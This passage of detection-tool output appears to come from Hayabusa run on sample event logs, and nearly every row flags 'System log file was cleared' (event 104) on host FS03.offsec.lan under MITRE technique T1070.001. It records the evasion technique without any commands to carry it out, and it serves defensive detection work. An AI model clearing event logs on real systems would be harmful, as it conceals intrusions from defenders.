Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.340 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.903 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.341 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:10.997 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.778 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
